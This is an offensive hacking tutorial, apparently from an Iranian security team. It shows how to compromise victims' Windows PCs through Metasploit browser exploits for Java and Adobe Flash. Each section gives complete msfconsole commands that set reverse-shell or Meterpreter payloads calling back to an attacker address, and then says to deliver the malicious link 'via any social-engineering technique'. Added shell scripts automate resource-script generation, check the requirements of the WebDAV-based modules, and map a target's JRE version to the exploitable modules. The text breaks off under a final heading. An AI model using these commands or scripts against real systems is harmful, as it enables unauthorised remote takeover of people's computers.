Back Track Tutorials

How to Attack a Remote PC with Application Vulnerabilities

By : Red H4t V!per


All Rights Reserved for IrIsT Security Team
IrIsT.Ir

Contact : RedH4t.Viper@yahoo.com , RedH4t.Viper@gmail.com

Copyright : All Rights Reserved for IrIsT Security Team - Behnam Abbasi Vanda. Special Thanks To : Am!r , C0dex , B3HZ4D , TaK.FaNaR , 0x0ptim0us , Mr.XHat , Skote_Vahshat , (^_^) Gr33TZ To : IrIsT , TBH , 3xp1r3 , KurdHackTeam

Introduction : In this paper an attempt is made to show how to exploit application vulnerabilities and get access to a remote PC with Metasploit on BackTrack. It is assumed that you are familiar enough with the Linux operating system and with the Metasploit software, so we go straight to the attack topic. Every example uses 192.168.42.131 as the attacker's BackTrack address; substitute your own. The module paths are the ones shipped with BackTrack's Metasploit; if `use` reports a module as not found, `search <module name>` shows where it lives now (several of the Java modules have since moved under exploit/multi/browser). Thanks to all of you for reading this article.


Attacking a Remote Windows PC using the Java Signed Applet Method :


This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop up a dialog asking whether they trust the signed applet. On older versions the dialog will display the value of CERTCN in the Publisher line. Newer JVMs display UNKNOWN when the signature is not trusted (i.e., it is not signed by a trusted CA). The SigningCert option allows you to provide a trusted code-signing certificate, whose values override CERTCN. If SigningCert is not given, a randomly generated self-signed certificate is used. Either way, once the user clicks Run, the applet executes with the full permissions of the logged-in user. Note that no JRE bug is involved: success depends on the user accepting the dialog, so CERTCN and APPLETNAME should be chosen to fit the pretext.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/multi/browser/java_signed_applet
show options

msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set appletname adobe        (the main applet's class name)
msf exploit(java_signed_applet) > set certcn adobe player     (the name shown in the certificate)
msf exploit(java_signed_applet) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_signed_applet) > set srvport 80              (the local port to listen on, default 8080; port 80 needs root)
msf exploit(java_signed_applet) > set uripath adobeclipes     (the URL path to use for this exploit)
msf exploit(java_signed_applet) > set lhost 192.168.42.131    (the address the reverse payload connects back to; required for windows/meterpreter/reverse_tcp)
msf exploit(java_signed_applet) > set lport 4443              (the port the reverse payload connects back to)
msf exploit(java_signed_applet) > exploit

Now the URL to give the victim is http://192.168.42.131/adobeclipes (no port in the link because SRVPORT was set to 80; with the default SRVPORT the link would carry :8080). Deliver the link via any social-engineering technique. When the victim opens it in their browser and clicks Run in the Java dialog, the applet runs the payload and you get a session on the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.
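The sequence above is repeated, with different module names and paths, for every browser module in this paper, and the link handed to the victim must agree with SRVHOST, SRVPORT and URIPATH or the request never reaches the Metasploit web server (the paper's own links drop the port when SRVPORT is 80 and otherwise carry :8080). The shell script below is an added example, not part of the original paper or of Metasploit: it writes a resource script that `msfconsole -r` replays line by line and derives the victim link from the same values. The module, option values and the 192.168.42.131 lab address are taken from the section above; the function names are the example's own.

```shell
#!/bin/sh
# Added example (not from the paper or Metasploit): write the resource script
# for one browser module and derive the victim link from the same values.
# Assumption: the paper's 192.168.42.131 lab address; option names are the
# standard Metasploit datastore options used in the section above.

# victim_url HOST PORT URIPATH -> http://HOST[:PORT]/URIPATH
# Port 80 is the HTTP default and is omitted, as in the paper's own links;
# any other SRVPORT must appear in the link or the request never reaches msf.
victim_url() {
  host=$1; port=$2; path=${3#/}          # exactly one leading slash
  if [ "$port" = 80 ]; then
    printf 'http://%s/%s\n' "$host" "$path"
  else
    printf 'http://%s:%s/%s\n' "$host" "$port" "$path"
  fi
}

# browser_rc MODULE PAYLOAD SRVHOST SRVPORT URIPATH LHOST LPORT [EXTRA...]
# Prints a resource script; EXTRA entries are module-specific "NAME value"
# pairs (APPLETNAME, CERTCN, TARGET ...). `exploit -j` starts the web server
# as a background job so `sessions -l` / `sessions -i N` stay available.
browser_rc() {
  mod=$1 pay=$2 srvhost=$3 srvport=$4 uripath=$5 lhost=$6 lport=$7
  shift 7
  printf 'use %s\n' "$mod"
  printf 'set PAYLOAD %s\n' "$pay"
  printf 'set SRVHOST %s\n' "$srvhost"
  printf 'set SRVPORT %s\n' "$srvport"
  printf 'set URIPATH %s\n' "$uripath"
  printf 'set LHOST %s\n' "$lhost"
  printf 'set LPORT %s\n' "$lport"
  for extra in "$@"; do
    printf 'set %s\n' "$extra"
  done
  printf 'exploit -j\n'
}

# The signed-applet section above: SRVPORT 80 needs root (BackTrack's default
# user), LPORT 4443 is the port the reverse Meterpreter dials back to.
browser_rc exploit/multi/browser/java_signed_applet windows/meterpreter/reverse_tcp \
  192.168.42.131 80 adobeclipes 192.168.42.131 4443 \
  "APPLETNAME adobe" "CERTCN adobe player"
echo "# save the lines above as signed.rc and run: msfconsole -r signed.rc"
echo "# send the victim: $(victim_url 192.168.42.131 80 adobeclipes)"
```

Redirect the output to a file and start it with `msfconsole -r file.rc`; for the later sections replace the module path and pass the module's own options (for example "TARGET 1" for the Rhino module) as extra arguments.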

Attacking a Remote Windows PC using Sun Java Command Line Injection :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser-known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled. Both requirements come from the same mechanism: -XXaltjvm makes the victim's JVM load its jvm.dll from a UNC path pointing at the attacker, and the Windows WebClient service only falls back to WebDAV on port 80 once the SMB connection to that host fails. So SRVPORT must be 80 (which needs root) and nothing may answer on 445.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_ws_vmargs

msf exploit(java_ws_vmargs) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_ws_vmargs) > set lhost 192.168.42.131    (IP of the local host, where the payload connects back)
msf exploit(java_ws_vmargs) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_ws_vmargs) > set srvport 80              (must be 80: the victim's WebClient service fetches the UNC path over WebDAV on port 80)
msf exploit(java_ws_vmargs) > set uripath /               (the URL path to use for this exploit)
msf exploit(java_ws_vmargs) > exploit

Now give the victim the URL http://192.168.42.131/ (no port, since SRVPORT is 80) and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Java AtomicReferenceArray Type Violation Vulnerability :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_atomicreferencearray

msf exploit(java_atomicreferencearray) > set payload generic/shell_reverse_tcp
msf exploit(java_atomicreferencearray) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_atomicreferencearray) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_atomicreferencearray) > set uripath yes             (the URL path to use for this exploit)
msf exploit(java_atomicreferencearray) > exploit

Now give the victim the URL http://192.168.42.131:8080/yes (SRVPORT was left at its default, 8080) and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Java Trusted Chain Method :

This module exploits a vulnerability in the Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_trusted_chain

msf exploit(java_trusted_chain) > set payload java/meterpreter/reverse_tcp
msf exploit(java_trusted_chain) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_trusted_chain) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_trusted_chain) > set uripath jta             (the URL path to use for this exploit)
msf exploit(java_trusted_chain) > exploit

Now give the victim the URL http://192.168.42.131:8080/jta and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Java RMIConnectionImpl Deserialization Privilege Escalation Exploit :

This module exploits a vulnerability in the Java Runtime Environment that allows a MarshalledObject containing a custom class loader to be deserialized under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Open a BackTrack terminal, type msfconsole, then enter the commands below (no payload is set here, so the module's default payload is used):

use exploit/windows/browser/java_rmi_connection_impl

msf exploit(java_rmi_connection_impl) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_rmi_connection_impl) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_rmi_connection_impl) > set uripath bip             (the URL path to use for this exploit)
msf exploit(java_rmi_connection_impl) > exploit

Now give the victim the URL http://192.168.42.131:8080/bip and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Sun Java Runtime Buffer Overflow :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before 6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a launchjnlp parameter, it copies the contents of the docbase parameter into a stack buffer using the sprintf function. A string of 396 bytes is enough to overflow the 256-byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: the string being copied is first passed through WideCharToMultiByte; because of this, only characters which have a valid localized multibyte representation are allowed, and invalid characters are replaced with question marks (?).
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_docbase_bof

msf exploit(java_docbase_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_docbase_bof) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_docbase_bof) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_docbase_bof) > set uripath jab             (the URL path to use for this exploit)
msf exploit(java_docbase_bof) > exploit

Now give the victim the URL http://192.168.42.131:8080/jab and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Sun Java Applet2ClassLoader Remote Code Execution :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java sandbox. When an applet is invoked with:
1. a codebase parameter that points at a trusted directory, and
2. a code parameter that is a URL that does not contain any dots,
the applet will run outside of the sandbox. This vulnerability affects JRE prior to version 6 update 24.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_codebase_trust

msf exploit(java_codebase_trust) > set payload java/meterpreter/reverse_tcp
msf exploit(java_codebase_trust) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_codebase_trust) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_codebase_trust) > set uripath jt              (the URL path to use for this exploit)
msf exploit(java_codebase_trust) > exploit

Now give the victim the URL http://192.168.42.131:8080/jt and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Sun Java Web Start BasicServiceImpl Code Execution :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects version 6 prior to update 22. NOTE: exploiting this vulnerability causes several sinister-looking popup windows saying that Java is "Downloading application".
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_basicservice_impl

msf exploit(java_basicservice_impl) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_basicservice_impl) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_basicservice_impl) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_basicservice_impl) > set uripath jbs             (the URL path to use for this exploit)
msf exploit(java_basicservice_impl) > exploit

Now give the victim the URL http://192.168.42.131:8080/jbs and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Java Applet Rhino Script Engine Vulnerability :

This module exploits a vulnerability in the Rhino script engine that can be used by a Java applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example IE, Firefox, Google Chrome, etc.).
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_rhino

msf exploit(java_rhino) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_rhino) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_rhino) > set target 1                (target index for the victim's operating system; show targets lists them)
msf exploit(java_rhino) > set uripath jr              (the URL path to use for this exploit)
msf exploit(java_rhino) > exploit

Now give the victim the URL http://192.168.42.131:8080/jr and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Java MixerSequencer Object GM_Song Structure Handling Vulnerability :

This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF file. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A MIDI block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When the vulnerability triggers, ebx points to a fake event in the MIDI file which stores the shellcode. A jmp ebx from msvcr71.dll is used to make the exploit reliable across Java updates, which is also why this module is Windows-only.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_mixer_sequencer

msf exploit(java_mixer_sequencer) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_mixer_sequencer) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_mixer_sequencer) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_mixer_sequencer) > set uripath jm              (the URL path to use for this exploit)
msf exploit(java_mixer_sequencer) > exploit

Now give the victim the URL http://192.168.42.131:8080/jm and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Sun Java Calendar Deserialization Privilege Escalation :

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload, which is generated as an executable and dropped and executed on the target, or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, and SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_calendar_deserialize

msf exploit(java_calendar_deserialize) > set payload java/meterpreter/reverse_tcp
msf exploit(java_calendar_deserialize) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_calendar_deserialize) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_calendar_deserialize) > set uripath jc              (the URL path to use for this exploit)
msf exploit(java_calendar_deserialize) > exploit

Now give the victim the URL http://192.168.42.131:8080/jc and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Sun Java JRE getSoundbank Buffer Overflow :

This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open a BackTrack terminal, type msfconsole, then enter the commands below (SRVHOST is left at its default here, so the server listens on all local addresses):

use exploit/multi/browser/java_getsoundbank_bof

msf exploit(java_getsoundbank_bof) > set payload generic/shell_reverse_tcp
msf exploit(java_getsoundbank_bof) > set lhost 192.168.42.131  (IP of the local host)
msf exploit(java_getsoundbank_bof) > set uripath js            (the URL path to use for this exploit)
msf exploit(java_getsoundbank_bof) > exploit

Now give the victim the URL http://192.168.42.131:8080/js (the path must match the URIPATH set above) and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Sun Java JRE AWT setDiffICM Buffer Overflow :

This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_setdifficm_bof

msf exploit(java_setdifficm_bof) > set payload generic/shell_reverse_tcp
msf exploit(java_setdifficm_bof) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_setdifficm_bof) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_setdifficm_bof) > set uripath rb              (the URL path to use for this exploit)
msf exploit(java_setdifficm_bof) > exploit

Now give the victim the URL http://192.168.42.131:8080/rb and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Sun Java Web Start Plugin Command Line Argument Injection :

This module exploits a flaw in the Web Start Plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser-known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 are believed to be affected by this vulnerability. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled. As with the java_ws_vmargs module earlier, the altjvm DLL is fetched from a UNC path, and the WebClient service only falls back to WebDAV on port 80 after SMB to the attacker's host fails, so SRVPORT must be 80 and nothing may answer on 445.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/java_ws_arginject_altjvm

msf exploit(java_ws_arginject_altjvm) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_ws_arginject_altjvm) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_ws_arginject_altjvm) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_ws_arginject_altjvm) > set srvport 80              (must be 80 for the WebDAV fallback)
msf exploit(java_ws_arginject_altjvm) > exploit

Now give the victim the URL http://192.168.42.131/ (no port, since SRVPORT is 80; URIPATH was left at its default) and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.
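Both Web Start argument-injection sections (this one and the java_ws_vmargs section earlier) require root and a host that serves no SMB, and set SRVPORT 80. The script below is an added pre-flight check, not part of the paper or of Metasploit: it reads the Linux socket table in /proc/net/tcp and /proc/net/tcp6, lists the ports in LISTEN state (state column 0A), and reports a blocker if port 80 is already bound, something listens on 445, or the shell is not root. The /proc/net/tcp content used for the demonstration is constructed; the real check runs only where those files exist.

```shell
#!/bin/sh
# Added pre-flight for the WebDAV-based Web Start modules (not from the paper).
# Blockers: not root (cannot bind SRVPORT 80), port 80 already bound, SMB
# answering on 445 (the victim's WebClient service only falls back to WebDAV
# over port 80 after SMB fails). Assumption: Linux, where /proc/net/tcp and
# /proc/net/tcp6 list sockets and the state column "0A" means LISTEN.

# listen_ports FILE... -> decimal ports in LISTEN state, sorted, one per line.
# Each row is "sl local_address rem_address st ..." with hex "addr:port".
listen_ports() {
  for f in "$@"; do
    while read -r sl local rem st rest; do
      [ "$st" = "0A" ] || continue          # skips the header and non-LISTEN rows
      echo $(( 0x${local#*:} ))             # hex port after the colon
    done < "$f"
  done | sort -un
}

# port_bound PORT FILE... -> status 0 when some socket listens on PORT
port_bound() {
  p=$1; shift
  listen_ports "$@" | grep -qx "$p"
}

# preflight FILE... -> prints findings, status 1 if any blocker is present
preflight() {
  rc=0
  if [ "$(id -u)" -ne 0 ]; then
    echo "BLOCK: not root, SRVPORT 80 cannot be bound"; rc=1
  fi
  if port_bound 80 "$@"; then
    echo "BLOCK: port 80 is already bound, stop the local web server"; rc=1
  fi
  if port_bound 445 "$@"; then
    echo "BLOCK: SMB is served on 445, stop it so the victim falls back to WebDAV"; rc=1
  fi
  [ "$rc" -eq 0 ] && echo "OK: root, port 80 free, nothing on 445"
  return "$rc"
}

# Constructed /proc/net/tcp sample for the demonstration: 0050 = 80 and
# 1F90 = 8080 are LISTEN (0A); 01BD = 445 appears only as an ESTABLISHED (01)
# row, so it does not count as served.
constructed_sample() {
  cat <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:01BD 0100007F:C3A0 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 20 4 30 10 -1
EOF
}

tmp=$(mktemp)
constructed_sample > "$tmp"
echo "listening in the constructed sample: $(listen_ports "$tmp" | tr '\n' ' ')"
rm -f "$tmp"

# Real check on this host, where the socket tables exist
files=""
for f in /proc/net/tcp /proc/net/tcp6; do
  if [ -r "$f" ]; then files="$files $f"; fi
done
if [ -n "$files" ]; then
  preflight $files || echo "fix the blockers above before running 'exploit'"
else
  echo "no /proc/net/tcp on this host, run the check on the BackTrack box"
fi
```

Run it as the user who will start msfconsole; a clean "OK" line means the module's two environmental requirements are met and the only remaining variable is the victim's WebClient service.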

Attacking a Remote Windows PC using Java Applet JAX-WS Remote Code Execution :

This module abuses the JAX-WS classes from a Java applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in November 2012. The vulnerability affects Java version 7u7 and earlier.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/multi/browser/java_jre17_jaxws

msf exploit(java_jre17_jaxws) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_jaxws) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_jre17_jaxws) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_jre17_jaxws) > set uripath /               (the URL path to use for this exploit)
msf exploit(java_jre17_jaxws) > exploit

Now give the victim the URL http://192.168.42.131:8080/ and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Java 7 Applet Remote Code Execution :

The exploit takes advantage of two issues in JDK 7: ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for Class.forName in JDK 6. It allows untrusted code to obtain a reference to, and access, a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, getField() can be invoked by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that is not always the case in JDK 6) in order to access the private Statement.acc field, modify the AccessControlContext, and then disable the SecurityManager. Once the SecurityManager is disabled, arbitrary Java code can be executed. The module has been tested successfully against multiple platforms, including IE, Firefox, Safari and Chrome on Windows, Ubuntu, OS X and Solaris.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/multi/browser/java_jre17_exec

msf exploit(java_jre17_exec) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_exec) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_jre17_exec) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_jre17_exec) > set uripath /               (the URL path to use for this exploit)
msf exploit(java_jre17_exec) > exploit

Now give the victim the URL http://192.168.42.131:8080/ and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Java Applet Field Bytecode Verifier Cache Remote Code Execution :

This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimization of the GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.
Open a BackTrack terminal, type msfconsole, then enter the commands below (the module lives under exploit/multi/browser, not under a windows subtree):

use exploit/multi/browser/java_verifier_field_access

msf exploit(java_verifier_field_access) > set payload java/shell_reverse_tcp
msf exploit(java_verifier_field_access) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(java_verifier_field_access) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(java_verifier_field_access) > set uripath /               (the URL path to use for this exploit)
msf exploit(java_verifier_field_access) > exploit

Now give the victim the URL http://192.168.42.131:8080/ and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.
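Each Java section above states which JRE versions its module affects, so the first question on an engagement is which of them still apply to the version a target reports. The script below is an added example, not part of the paper or of Metasploit, that turns those statements into a lookup: give it a Sun-style version string (1.6.0_18, or the first line of `java -version`) and it lists the paper's modules whose stated ranges cover it. Only the ranges the sections actually state are encoded; modules whose sections give no version (signed applet, AtomicReferenceArray, verifier field access, JRE 7 exec) and the 1.3.x/1.4.x ranges are omitted, and "version 7" for the Rhino module is read as the unpatched 7.0 release, which is an assumption.

```shell
#!/bin/sh
# Added example (not from the paper): which of the paper's Java modules still
# cover a given JRE, using only the affected-version statements in the sections
# above. Assumption: Sun-style version strings (1.6.0_18, or the first line of
# `java -version`); Java 1.3/1.4 ranges and modules whose sections state no
# version are not encoded.

# parse_java_version STRING -> "MAJOR UPDATE" (e.g. "6 18"); status 1 unless 1.5-1.7
parse_java_version() {
  maj=$(printf '%s\n' "$1" | sed -n 's/.*1\.\([5-7]\)\.0.*/\1/p')
  [ -n "$maj" ] || return 1
  upd=$(printf '%s\n' "$1" | sed -n 's/.*1\.[5-7]\.0_0*\([0-9][0-9]*\).*/\1/p')
  printf '%s %s\n' "$maj" "${upd:-0}"      # no "_NN" suffix means the .0 release
}

# Affected ranges exactly as the section texts state them:
#   lt N = "prior to / before update N", le N = "update N and earlier",
#   ge N = "all versions since update N" (the arginject section names no fix).
# "version 7" for java_rhino is taken as the unpatched 7.0 release (assumption).
EXPOSURE_TABLE=$(cat <<'EOF'
java_trusted_chain        6 lt 19
java_trusted_chain        5 lt 23
java_rmi_connection_impl  6 lt 19
java_rmi_connection_impl  5 lt 23
java_docbase_bof          6 lt 22
java_codebase_trust       6 lt 24
java_basicservice_impl    6 lt 22
java_rhino                7 le 0
java_rhino                6 le 27
java_mixer_sequencer      6 le 18
java_calendar_deserialize 6 le 10
java_calendar_deserialize 5 le 16
java_getsoundbank_bof     6 le 16
java_getsoundbank_bof     5 le 21
java_setdifficm_bof       6 le 16
java_setdifficm_bof       5 le 21
java_ws_arginject_altjvm  6 ge 10
java_jre17_jaxws          7 le 7
EOF
)

# java_exposed VERSION -> module names whose stated ranges cover it, one per line
java_exposed() {
  pv=$(parse_java_version "$1") || { echo "unrecognised version: $1" >&2; return 2; }
  major=${pv% *}; upd=${pv#* }
  printf '%s\n' "$EXPOSURE_TABLE" | while read -r mod maj op n; do
    [ "$maj" = "$major" ] || continue
    case $op in
      lt) if [ "$upd" -lt "$n" ]; then echo "$mod"; fi ;;
      le) if [ "$upd" -le "$n" ]; then echo "$mod"; fi ;;
      ge) if [ "$upd" -ge "$n" ]; then echo "$mod"; fi ;;
    esac
  done
}

for v in 1.6.0_18 1.7.0_05 1.7.0_09 1.5.0_20; do
  echo "$v: $(java_exposed "$v" | tr '\n' ' ')"
done
```

The version string can be taken from a deployment inventory or from `java -version` on a test box; an empty result means none of the paper's version-gated modules applies and only the user-assisted ones (the signed applet) remain.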


Attacking a Remote Windows PC using Adobe Flash Player 11.3 Font Parsing Code Execution :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild. Because the ActiveX component is targeted, the victim must open the link in Internet Explorer.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/adobe_flash_otf_font

msf exploit(adobe_flash_otf_font) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_otf_font) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(adobe_flash_otf_font) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(adobe_flash_otf_font) > set uripath fpu             (the URL path to use for this exploit)
msf exploit(adobe_flash_otf_font) > exploit

Now give the victim the URL http://192.168.42.131:8080/fpu and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using Adobe Flash Player Object Type Confusion :

